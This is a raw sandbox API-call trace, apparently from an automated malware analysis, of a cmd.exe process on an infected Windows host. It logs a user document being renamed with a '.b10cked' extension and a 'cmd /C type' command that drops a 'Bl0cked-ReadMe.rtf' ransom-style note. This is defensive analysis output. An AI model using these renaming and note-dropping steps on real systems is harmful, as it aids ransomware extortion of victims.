returned 0x10 [0134.387] _wcsicmp (_String1="TQ3YPK~1.DOC", _String2=".") returned 70 [0134.387] _wcsicmp (_String1="TQ3YPK~1.DOC", _String2="..") returned 70 [0134.387] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\TQ3YPK~1.DOC" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1\\tq3ypk~1.doc")) returned 0x20 [0134.387] SetErrorMode (uMode=0x0) returned 0x0 [0134.387] SetErrorMode (uMode=0x1) returned 0x0 [0134.387] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\TQ3YPK~1.DOC", nBufferLength=0x104, lpBuffer=0x28f068, lpFilePart=0x28ee00 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\TQ3YPK~1.DOC", lpFilePart=0x28ee00*="TQ3YPK~1.DOC") returned 0x33 [0134.387] SetErrorMode (uMode=0x0) returned 0x1 [0134.387] SetErrorMode (uMode=0x0) returned 0x0 [0134.387] SetErrorMode (uMode=0x1) returned 0x0 [0134.388] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Tq3yPk_6C.docx.b10cked", nBufferLength=0x104, lpBuffer=0x28f270, lpFilePart=0x28ee00 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Tq3yPk_6C.docx.b10cked", lpFilePart=0x28ee00*="Tq3yPk_6C.docx.b10cked") returned 0x3d [0134.388] SetErrorMode (uMode=0x0) returned 0x1 [0134.388] SetLastError (dwErrCode=0x0) [0134.388] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Tq3yPk_6C.docx.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1\\tq3ypk_6c.docx.b10cked")) returned 0xffffffff [0134.388] GetLastError () returned 0x2 [0134.388] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\TQ3YPK~1.DOC", fInfoLevelId=0x1, lpFindFileData=0x28e77c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e77c) returned 0x380ef0 [0134.388] FindNextFileW (in: hFindFile=0x380ef0, lpFindFileData=0x28e77c | out: lpFindFileData=0x28e77c) returned 0 [0134.389] GetLastError () returned 0x12 [0134.389] FindClose (in: 
hFindFile=0x380ef0 | out: hFindFile=0x380ef0) returned 1 [0134.390] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\TQ3YPK~1.DOC", fInfoLevelId=0x1, lpFindFileData=0x391c30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x391c30) returned 0x380ef0 [0134.390] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Tq3yPk_6C.docx.b10cked", nBufferLength=0x104, lpBuffer=0x28ea14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Tq3yPk_6C.docx.b10cked", lpFilePart=0x0) returned 0x3d [0134.390] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Tq3yPk_6C.docx", nBufferLength=0x104, lpBuffer=0x28ea14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Tq3yPk_6C.docx", lpFilePart=0x0) returned 0x35 [0134.390] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Tq3yPk_6C.docx" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1\\tq3ypk_6c.docx")) returned 0x20 [0134.390] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Tq3yPk_6C.docx" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1\\tq3ypk_6c.docx"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Tq3yPk_6C.docx.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1\\tq3ypk_6c.docx.b10cked"), dwFlags=0x3) returned 1 [0134.391] FindClose (in: hFindFile=0x380ef0 | out: hFindFile=0x380ef0) returned 1 [0134.391] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x28e9c8 | out: _Buffer=" 1") returned 9 [0134.391] _get_osfhandle (_FileHandle=1) returned 0x7 [0134.391] GetFileType (hFile=0x7) returned 0x2 [0134.391] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0134.391] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28e954 | out: lpMode=0x28e954) returned 1 [0134.391] _get_osfhandle (_FileHandle=1) returned 0x7 [0134.391] 
GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x28e988 | out: lpConsoleScreenBufferInfo=0x28e988) returned 1 [0134.391] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0134.392] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x28e9c8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0134.392] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x28e9ac, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28e9ac*=0x1a) returned 1 [0134.392] _get_osfhandle (_FileHandle=1) returned 0x7 [0134.392] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0134.392] _get_osfhandle (_FileHandle=1) returned 0x7 [0134.392] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0134.392] _get_osfhandle (_FileHandle=0) returned 0x3 [0134.392] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0134.393] SetConsoleInputExeNameW () returned 0x1 [0134.393] GetConsoleOutputCP () returned 0x1b5 [0134.393] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0134.393] SetThreadUILanguage (LangId=0x0) returned 0x409 [0134.393] exit (_Code=0) Process: id = "128" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16840" os_pid = "0xb90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" 
os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13223 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13224 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13225 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13226 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 13227 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 13228 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13229 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13230 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 13231 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" 
filename = "" Region: id = 13232 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 13298 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13299 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 13300 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 13301 start_va = 0x2d0000 end_va = 0x336fff entry_point = 0x2d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13302 start_va = 0x520000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 13303 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 13304 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 13305 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 13306 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13307 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 
region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 13308 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 13309 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 13310 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 13311 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 13312 start_va = 0x340000 end_va = 0x407fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 13313 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 13314 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 13315 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 13316 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 13317 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = 
"private_0x0000000000170000" filename = "" Region: id = 13318 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 13319 start_va = 0x410000 end_va = 0x510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 13320 start_va = 0x530000 end_va = 0x112ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13321 start_va = 0x1130000 end_va = 0x1292fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001130000" filename = "" Thread: id = 185 os_tid = 0xb9c [0134.319] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fa8c | out: lpSystemTimeAsFileTime=0x16fa8c*(dwLowDateTime=0x89fe3500, dwHighDateTime=0x1d440a9)) [0134.319] GetCurrentProcessId () returned 0xb90 [0134.319] GetCurrentThreadId () returned 0xb9c [0134.319] GetTickCount () returned 0x2a997 [0134.319] QueryPerformanceCounter (in: lpPerformanceCount=0x16fa84 | out: lpPerformanceCount=0x16fa84*=19111003200) returned 1 [0134.321] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0134.322] __set_app_type (_Type=0x1) [0134.322] __p__fmode () returned 0x76b331f4 [0134.322] __p__commode () returned 0x76b331fc [0134.322] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0134.322] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0134.322] GetCurrentThreadId () returned 0xb9c [0134.322] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb9c) returned 0x38 [0134.322] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0134.322] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0134.322] SetThreadUILanguage (LangId=0x0) returned 0x409 
[0134.323] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0134.323] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16fa1c | out: phkResult=0x16fa1c*=0x0) returned 0x2 [0134.323] VirtualQuery (in: lpAddress=0x16fa53, lpBuffer=0x16f9ec, dwLength=0x1c | out: lpBuffer=0x16f9ec*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0134.323] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16f9ec, dwLength=0x1c | out: lpBuffer=0x16f9ec*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0134.323] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16f9ec, dwLength=0x1c | out: lpBuffer=0x16f9ec*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0134.323] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16f9ec, dwLength=0x1c | out: lpBuffer=0x16f9ec*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0134.323] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16f9ec, dwLength=0x1c | out: lpBuffer=0x16f9ec*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0134.323] GetConsoleOutputCP () returned 0x1b5 [0134.323] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0134.323] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0134.323] _get_osfhandle (_FileHandle=1) returned 0x7 [0134.323] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0134.323] _get_osfhandle (_FileHandle=1) returned 
0x7 [0134.323] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0134.324] _get_osfhandle (_FileHandle=1) returned 0x7 [0134.324] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0134.324] _get_osfhandle (_FileHandle=0) returned 0x3 [0134.324] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0134.324] _get_osfhandle (_FileHandle=0) returned 0x3 [0134.324] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0134.324] GetEnvironmentStringsW () returned 0x1e0198* [0134.324] FreeEnvironmentStringsW (penv=0x1e0198) returned 1 [0134.324] GetEnvironmentStringsW () returned 0x1e0198* [0134.325] FreeEnvironmentStringsW (penv=0x1e0198) returned 1 [0134.325] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e98c | out: phkResult=0x16e98c*=0x40) returned 0x0 [0134.325] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e994, lpData=0x16e998, lpcbData=0x16e990*=0x1000 | out: lpType=0x16e994*=0x0, lpData=0x16e998*=0xc0, lpcbData=0x16e990*=0x1000) returned 0x2 [0134.325] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e994, lpData=0x16e998, lpcbData=0x16e990*=0x1000 | out: lpType=0x16e994*=0x4, lpData=0x16e998*=0x1, lpcbData=0x16e990*=0x4) returned 0x0 [0134.325] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e994, lpData=0x16e998, lpcbData=0x16e990*=0x1000 | out: lpType=0x16e994*=0x0, lpData=0x16e998*=0x1, lpcbData=0x16e990*=0x1000) returned 0x2 [0134.325] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e994, lpData=0x16e998, lpcbData=0x16e990*=0x1000 | out: lpType=0x16e994*=0x4, lpData=0x16e998*=0x0, lpcbData=0x16e990*=0x4) returned 0x0 [0134.325] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", 
lpReserved=0x0, lpType=0x16e994, lpData=0x16e998, lpcbData=0x16e990*=0x1000 | out: lpType=0x16e994*=0x4, lpData=0x16e998*=0x40, lpcbData=0x16e990*=0x4) returned 0x0 [0134.325] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e994, lpData=0x16e998, lpcbData=0x16e990*=0x1000 | out: lpType=0x16e994*=0x4, lpData=0x16e998*=0x40, lpcbData=0x16e990*=0x4) returned 0x0 [0134.325] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e994, lpData=0x16e998, lpcbData=0x16e990*=0x1000 | out: lpType=0x16e994*=0x0, lpData=0x16e998*=0x40, lpcbData=0x16e990*=0x1000) returned 0x2 [0134.325] RegCloseKey (hKey=0x40) returned 0x0 [0134.325] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e98c | out: phkResult=0x16e98c*=0x40) returned 0x0 [0134.325] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e994, lpData=0x16e998, lpcbData=0x16e990*=0x1000 | out: lpType=0x16e994*=0x0, lpData=0x16e998*=0x40, lpcbData=0x16e990*=0x1000) returned 0x2 [0134.325] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e994, lpData=0x16e998, lpcbData=0x16e990*=0x1000 | out: lpType=0x16e994*=0x4, lpData=0x16e998*=0x1, lpcbData=0x16e990*=0x4) returned 0x0 [0134.325] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e994, lpData=0x16e998, lpcbData=0x16e990*=0x1000 | out: lpType=0x16e994*=0x0, lpData=0x16e998*=0x1, lpcbData=0x16e990*=0x1000) returned 0x2 [0134.325] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e994, lpData=0x16e998, lpcbData=0x16e990*=0x1000 | out: lpType=0x16e994*=0x4, lpData=0x16e998*=0x0, lpcbData=0x16e990*=0x4) returned 0x0 [0134.325] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e994, lpData=0x16e998, 
lpcbData=0x16e990*=0x1000 | out: lpType=0x16e994*=0x4, lpData=0x16e998*=0x9, lpcbData=0x16e990*=0x4) returned 0x0 [0134.325] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e994, lpData=0x16e998, lpcbData=0x16e990*=0x1000 | out: lpType=0x16e994*=0x4, lpData=0x16e998*=0x9, lpcbData=0x16e990*=0x4) returned 0x0 [0134.326] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e994, lpData=0x16e998, lpcbData=0x16e990*=0x1000 | out: lpType=0x16e994*=0x0, lpData=0x16e998*=0x9, lpcbData=0x16e990*=0x1000) returned 0x2 [0134.326] RegCloseKey (hKey=0x40) returned 0x0 [0134.326] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886368 [0134.326] srand (_Seed=0x5b886368) [0134.326] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Bl0cked-ReadMe.rtf\"" [0134.326] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Bl0cked-ReadMe.rtf\"" [0134.326] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0134.326] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1e18f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0134.326] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0134.326] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0134.326] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | 
out: lpBuffer="") returned 0x0 [0134.326] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0134.326] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0134.327] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0134.327] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0134.327] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0134.327] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0134.327] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0134.327] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0134.327] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0134.327] GetEnvironmentStringsW () returned 0x1e22e8* [0134.327] FreeEnvironmentStringsW (penv=0x1e22e8) returned 1 [0134.327] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0134.327] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0134.327] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0134.327] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0134.327] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0134.327] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0134.327] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0134.327] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0134.327] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0134.327] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0134.327] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16f758 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0134.327] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16f758, lpFilePart=0x16f754 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", 
lpFilePart=0x16f754*="Desktop") returned 0x18 [0134.327] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0134.328] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f4d4 | out: lpFindFileData=0x16f4d4) returned 0x1e0028 [0134.328] FindClose (in: hFindFile=0x1e0028 | out: hFindFile=0x1e0028) returned 1 [0134.328] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f4d4 | out: lpFindFileData=0x16f4d4) returned 0x1e0028 [0134.328] FindClose (in: hFindFile=0x1e0028 | out: hFindFile=0x1e0028) returned 1 [0134.328] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x16f4d4 | out: lpFindFileData=0x16f4d4) returned 0x1e0028 [0134.328] FindClose (in: hFindFile=0x1e0028 | out: hFindFile=0x1e0028) returned 1 [0134.328] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0134.328] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0134.328] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0134.328] GetEnvironmentStringsW () returned 0x1e2b08* [0134.329] FreeEnvironmentStringsW (penv=0x1e2b08) returned 1 [0134.329] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0134.329] GetConsoleOutputCP () returned 0x1b5 [0134.329] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0134.329] GetUserDefaultLCID () returned 0x409 [0134.330] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0134.330] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16f898, cchData=128 | out: lpLCData="0") returned 2 [0134.330] 